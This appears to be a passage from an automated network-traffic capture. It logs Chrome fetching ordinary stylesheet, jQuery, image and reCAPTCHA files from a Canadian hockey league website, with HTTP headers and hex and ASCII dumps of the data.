                                                                                                                          Data Ascii: ;left:0;width:100%;height:100%;padding:10px 0px;color:#ffffff;text-align:center}.game__details--league--active--watch,.game__details--league--active--tickets{text-align:center;font-size:14px;font-weight:bold;line-height:5.5em}.game__details--league--activ
                                                                                                                          2025-01-13 21:01:14 UTC12733INData Raw: 31 35 70 78 20 34 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 7b 2e 74 61 62 6c 65 5f 5f 74 64 2c 2e 74 61 62 6c 65 5f 5f 74 64 2d 2d 64 61 72 6b 7b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 38 70 78 7d 7d 2e 74 61 62 6c 65 5f 5f 74 64 2d 2d 64 61 74 65 2c 2e 74 61 62 6c 65 5f 5f 74 64 2d 2d 64 72 61 66 74 2c 2e 74 61 62 6c 65 5f 5f 74 64 2d 2d 62 69 72 74 68 64 61 74 65 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 74 61 62 6c 65 5f 5f 74 64 2d 2d 74 65 61 6d 2d 63 6f 64 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 74 61 62 6c 65 5f 5f 74 68 2c 2e 74
                                                                                                                          Data Ascii: 15px 4px;vertical-align:middle;line-height:1.3}@media (min-width: 768px){.table__td,.table__td--dark{padding:15px 8px}}.table__td--date,.table__td--draft,.table__td--birthdate{white-space:nowrap}.table__td--team-code{text-transform:uppercase}.table__th,.t


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.11.2049806137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:14 UTC609OUTGET /app/themes/gthl/assets/dist/css/theme.css HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:14 UTC493INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:14 GMT
                                                                                                                          Content-Type: text/css
                                                                                                                          Content-Length: 51080
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:13:09 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:19 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961677547 961417474
                                                                                                                          Age: 115
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069c5-c788"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:14 UTC15891INData Raw: ef bb bf 40 69 6d 70 6f 72 74 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2f 32 2e 31 2e 32 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 29 3b 40 69 6d 70 6f 72 74 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 37 30 30 2c 33 30 30 2c 36 30 30 29 3b 40 69 6d 70 6f 72 74
                                                                                                                          Data Ascii: @import url(https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.css);@import url(https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,700,300,600);@import
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: 61 74 65 72 69 61 6c 2d 44 65 73 69 67 6e 2d 49 63 6f 6e 69 63 2d 46 6f 6e 74 22 3b 63 6f 6e 74 65 6e 74 3a 22 ef 8b 9a 22 7d 2e 66 75 6c 6c 2d 73 63 6f 72 65 73 2d 67 61 6d 65 5f 5f 6c 69 6e 6b 3a 61 66 74 65 72 7b 63 6f 6c 6f 72 3a 23 63 63 63 3b 63 6f 6e 74 65 6e 74 3a 22 7c 22 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 2e 67 61 6d 65 63 65 6e 74 72 65 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 33 34 38 30 43 33 7d 2e 67 61 6d 65 63 65 6e 74 72 65 5f 5f 6c 69 6e 6b 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 36 30 39 65 64 35 7d 2e 67 61 6d 65 63 65 6e 74 72 65 5f 5f 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 39 45 39 45 39 45 7d 2e 67 61 6d 65 63 65 6e 74 72 65 2d 6d 61 74 63 68 75 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                                                          Data Ascii: aterial-Design-Iconic-Font";content:""}.full-scores-game__link:after{color:#ccc;content:"|";pointer-events:none}.gamecentre__link{color:#3480C3}.gamecentre__link:hover{color:#609ed5}.gamecentre__legend{color:#9E9E9E}.gamecentre-matchup{background-color
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: 6f 6c 6f 72 3a 77 68 69 74 65 7d 7d 2e 73 63 6f 72 65 62 6f 61 72 64 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 63 63 63 7d 2e 73 63 6f 72 65 62 6f 61 72 64 5f 5f 68 65 61 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 73 63 6f 72 65 62 6f 61 72 64 5f 5f 68 65 61 64 65 72 2d 63 6c 6f 73 65 3a 61 66 74 65 72 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4d 61 74 65 72 69 61 6c 2d 44 65 73 69 67 6e 2d 49 63 6f 6e 69 63 2d 46 6f 6e 74 22 3b 63 6f 6e 74 65 6e 74 3a 22 ef 84 b6 22 7d 2e 73 63 6f 72 65 62 6f 61 72 64 2d 2d 76 69 73 69 62 6c 65 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 73 63 6f 72 65 62 6f 61 72 64 5f 5f 64 61 74 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f
                                                                                                                          Data Ascii: olor:white}}.scoreboard{border-bottom-color:#ccc}.scoreboard__header{background-color:#000;color:#fff}.scoreboard__header-close:after{font-family:"Material-Design-Iconic-Font";content:""}.scoreboard--visible{cursor:pointer}.scoreboard__date{border-colo
                                                                                                                          2025-01-13 21:01:14 UTC2421INData Raw: 6d 7b 70 61 64 64 69 6e 67 3a 31 70 78 7d 2e 73 75 62 2d 6d 65 6e 75 5f 5f 69 74 65 6d 2d 6c 69 6e 6b 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 63 61 70 69 74 61 6c 69 7a 65 7d 2e 73 75 62 2d 6d 65 6e 75 5f 5f 69 74 65 6d 2d 6c 69 6e 6b 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 38 65 38 65 38 7d 2e 66 6f 6f 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 74 6f 70 2d 6d 65 6e 75 5f 5f 68 6f 6d 65 2d 62 75 74 74 6f 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 6c 65 66 74 2d 6d 65 6e 75 5f 5f 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 6c 65 66 74 2d 6d 65 6e 75 5f 5f 73 65 61
                                                                                                                          Data Ascii: m{padding:1px}.sub-menu__item-link{text-transform:capitalize}.sub-menu__item-link:hover{background-color:#e8e8e8}.footer{background-color:#000}.top-menu__home-button{display:none}.left-menu__item-content{background-color:#ffffff;color:#000}.left-menu__sea


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.11.2049807137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:14 UTC599OUTGET /wp/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:14 UTC523INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:14 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 97184
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Sat, 11 Feb 2017 06:10:05 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:19 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961677549 961775443
                                                                                                                          Age: 115
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"589eaabd-17ba0"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:14 UTC15861INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 31 32 2e 34 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65
                                                                                                                          Data Ascii: /*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a docume
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: 61 73 65 28 29 5d 7c 7c 66 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74 75 72 6e 20 65 5b 75 5d 3f 65 28 62 29 3a 65 2e 6c 65 6e 67 74 68 3e 31 3f 28 63 3d 5b 61 2c 61 2c 22 22 2c 62 5d 2c 64 2e 73 65 74 46 69 6c 74 65 72 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3f 68 61 28 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 76 61 72 20 64 2c 66 3d 65 28 61 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 64 3d 4a 28 61 2c 66 5b 67 5d 29 2c 61 5b 64 5d 3d 21 28 63 5b 64 5d 3d 66 5b 67 5d 29 7d 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 65 28 61 2c 30 2c 63 29 7d 29 3a 65 7d 7d 2c 70 73 65 75 64 6f
                                                                                                                          Data Ascii: ase()]||fa.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?ha(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=J(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudo
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: 6f 64 65 54 79 70 65 2c 6a 3d 69 3f 6e 2e 63 61 63 68 65 3a 61 2c 6b 3d 69 3f 61 5b 68 5d 3a 61 5b 68 5d 26 26 68 3b 69 66 28 6b 26 26 6a 5b 6b 5d 26 26 28 65 7c 7c 6a 5b 6b 5d 2e 64 61 74 61 29 7c 7c 76 6f 69 64 20 30 21 3d 3d 64 7c 7c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 62 29 72 65 74 75 72 6e 20 6b 7c 7c 28 6b 3d 69 3f 61 5b 68 5d 3d 63 2e 70 6f 70 28 29 7c 7c 6e 2e 67 75 69 64 2b 2b 3a 68 29 2c 6a 5b 6b 5d 7c 7c 28 6a 5b 6b 5d 3d 69 3f 7b 7d 3a 7b 74 6f 4a 53 4f 4e 3a 6e 2e 6e 6f 6f 70 7d 29 2c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 62 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 62 7c 7c 28 65 3f 6a 5b 6b 5d 3d 6e 2e 65 78 74 65 6e 64 28 6a 5b 6b 5d 2c 62 29 3a 6a 5b 6b 5d 2e 64 61 74 61 3d 6e 2e 65 78 74
                                                                                                                          Data Ascii: odeType,j=i?n.cache:a,k=i?a[h]:a[h]&&h;if(k&&j[k]&&(e||j[k].data)||void 0!==d||"string"!=typeof b)return k||(k=i?a[h]=c.pop()||n.guid++:h),j[k]||(j[k]=i?{}:{toJSON:n.noop}),"object"!=typeof b&&"function"!=typeof b||(e?j[k]=n.extend(j[k],b):j[k].data=n.ext
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: 63 69 61 6c 2e 73 75 62 6d 69 74 3d 7b 73 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 2e 6e 6f 64 65 4e 61 6d 65 28 74 68 69 73 2c 22 66 6f 72 6d 22 29 3f 21 31 3a 76 6f 69 64 20 6e 2e 65 76 65 6e 74 2e 61 64 64 28 74 68 69 73 2c 22 63 6c 69 63 6b 2e 5f 73 75 62 6d 69 74 20 6b 65 79 70 72 65 73 73 2e 5f 73 75 62 6d 69 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 74 61 72 67 65 74 2c 63 3d 6e 2e 6e 6f 64 65 4e 61 6d 65 28 62 2c 22 69 6e 70 75 74 22 29 7c 7c 6e 2e 6e 6f 64 65 4e 61 6d 65 28 62 2c 22 62 75 74 74 6f 6e 22 29 3f 6e 2e 70 72 6f 70 28 62 2c 22 66 6f 72 6d 22 29 3a 76 6f 69 64 20 30 3b 63 26 26 21 6e 2e 5f 64 61 74 61 28 63 2c 22 73 75 62 6d 69 74 22 29 26 26 28 6e 2e 65 76 65 6e 74 2e 61 64 64
                                                                                                                          Data Ascii: cial.submit={setup:function(){return n.nodeName(this,"form")?!1:void n.event.add(this,"click._submit keypress._submit",function(a){var b=a.target,c=n.nodeName(b,"input")||n.nodeName(b,"button")?n.prop(b,"form"):void 0;c&&!n._data(c,"submit")&&(n.event.add
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: 3a 67 62 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 74 68 69 73 2e 65 6c 65 6d 3d 61 2c 74 68 69 73 2e 70 72 6f 70 3d 63 2c 74 68 69 73 2e 65 61 73 69 6e 67 3d 65 7c 7c 6e 2e 65 61 73 69 6e 67 2e 5f 64 65 66 61 75 6c 74 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 62 2c 74 68 69 73 2e 73 74 61 72 74 3d 74 68 69 73 2e 6e 6f 77 3d 74 68 69 73 2e 63 75 72 28 29 2c 74 68 69 73 2e 65 6e 64 3d 64 2c 74 68 69 73 2e 75 6e 69 74 3d 66 7c 7c 28 6e 2e 63 73 73 4e 75 6d 62 65 72 5b 63 5d 3f 22 22 3a 22 70 78 22 29 7d 2c 63 75 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 67 62 2e 70 72 6f 70 48 6f 6f 6b 73 5b 74 68 69 73 2e 70 72 6f 70 5d 3b 72 65 74 75 72 6e 20 61 26 26 61 2e 67 65 74 3f 61 2e 67 65 74 28 74 68 69 73
                                                                                                                          Data Ascii: :gb,init:function(a,b,c,d,e,f){this.elem=a,this.prop=c,this.easing=e||n.easing._default,this.options=b,this.start=this.now=this.cur(),this.end=d,this.unit=f||(n.cssNumber[c]?"":"px")},cur:function(){var a=gb.propHooks[this.prop];return a&&a.get?a.get(this
                                                                                                                          2025-01-13 21:01:14 UTC15787INData Raw: 2c 4b 62 3d 2f 5e 28 3f 3a 61 62 6f 75 74 7c 61 70 70 7c 61 70 70 2d 73 74 6f 72 61 67 65 7c 2e 2b 2d 65 78 74 65 6e 73 69 6f 6e 7c 66 69 6c 65 7c 72 65 73 7c 77 69 64 67 65 74 29 3a 24 2f 2c 4c 62 3d 2f 5e 28 3f 3a 47 45 54 7c 48 45 41 44 29 24 2f 2c 4d 62 3d 2f 5e 5c 2f 5c 2f 2f 2c 4e 62 3d 2f 5e 28 5b 5c 77 2e 2b 2d 5d 2b 3a 29 28 3f 3a 5c 2f 5c 2f 28 3f 3a 5b 5e 5c 2f 3f 23 5d 2a 40 7c 29 28 5b 5e 5c 2f 3f 23 3a 5d 2a 29 28 3f 3a 3a 28 5c 64 2b 29 7c 29 7c 29 2f 2c 4f 62 3d 7b 7d 2c 50 62 3d 7b 7d 2c 51 62 3d 22 2a 2f 22 2e 63 6f 6e 63 61 74 28 22 2a 22 29 2c 52 62 3d 44 62 2e 68 72 65 66 2c 53 62 3d 4e 62 2e 65 78 65 63 28 52 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7c 7c 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 62 28 61 29 7b 72 65 74 75 72 6e
                                                                                                                          Data Ascii: ,Kb=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Lb=/^(?:GET|HEAD)$/,Mb=/^\/\//,Nb=/^([\w.+-]+:)(?:\/\/(?:[^\/?#]*@|)([^\/?#:]*)(?::(\d+)|)|)/,Ob={},Pb={},Qb="*/".concat("*"),Rb=Db.href,Sb=Nb.exec(Rb.toLowerCase())||[];function Tb(a){return


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.11.2049808137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:14 UTC610OUTGET /wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:14 UTC521INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:14 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 10056
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Sat, 11 Feb 2017 06:10:05 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961417812 961970744
                                                                                                                          Age: 80
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"589eaabd-2748"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:14 UTC10056INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 31 2e 34 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 63 29 7b 76 61 72 20 64 3d 62 2e 63 6f 6e 73 6f 6c 65 3b 66 5b 63 5d 7c 7c 28 66 5b 63 5d 3d 21 30 2c 61 2e 6d 69 67 72 61 74 65 57 61 72 6e 69 6e 67 73 2e 70 75 73 68 28 63 29 2c 64 26 26 64 2e 77 61
                                                                                                                          Data Ascii: /*! jQuery Migrate v1.4.1 | (c) jQuery Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(a,b,c){function d(c){var d=b.console;f[c]||(f[c]=!0,a.migrateWarnings.push(c),d&&d.wa


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.11.204980954.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:14 UTC652OUTGET /app/uploads/gthl/2024/08/29093927/icons8-twitterx-48-1.png HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:14 UTC484INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 868
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:15 GMT
                                                                                                                          Last-Modified: Thu, 29 Aug 2024 13:39:28 GMT
                                                                                                                          ETag: "a1e561aeb53f4f4312149a4c3f65888d"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 749e1450fdc7cac18bb91a34e80053aa.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: 0ihIgFQ3sXaS1_HBfqk-203ZzsDgn1c_oMvQaACrHk9bDWpuWIvJjQ==
                                                                                                                          2025-01-13 21:01:14 UTC868INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 03 16 49 44 41 54 78 9c ed 59 4b 4b e3 50 14 ce 0f 99 81 5c 9b 56 44 5b 37 62 0d 74 51 50 17 05 dd d8 2a 5d b4 0b dd b4 88 7f 40 b0 14 d7 6e 7c d6 85 3f 40 fa a0 82 a0 74 55 b1 45 ba 6d 29 8a 74 d3 87 0b 41 3a a5 8e f8 00 1f 67 38 67 26 99 a8 9d 71 9a c1 24 8b 1c 38 8b dc dc b4 df 97 7b be 7b be 24 1c 67 86 19 66 98 61 d8 b0 58 2c 5f 79 9e 4f f1 3c ff 9d 31 06 5a 26 ff f3 3f f7 78 9e ef 55 0d 9e 31 f6 4d 6b e0 ec 7d b6 10 4b d7 04 f0 ce 1b 00 3c fc ca 84 1a 02 9a 97 0d fb 73 39 5d 77 4d 40 6f d0 ec 4d 9a 04 98 b9 02 cc 38 25 24 08 02 14 8b 45 e8 14 89 44 e2 9f 00 cd cd cd c1 d3 d3 13 64 b3
                                                                                                                          Data Ascii: PNGIHDR00WpHYsIDATxYKKP\VD[7btQP*]@n|?@tUEm)tA:g8g&q$8{{$gfaX,_yO<1Z&?xU1Mk}K<s9]wM@oM8%$EDd


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.11.204981064.233.180.1044431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:14 UTC631OUTGET /recaptcha/api.js HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
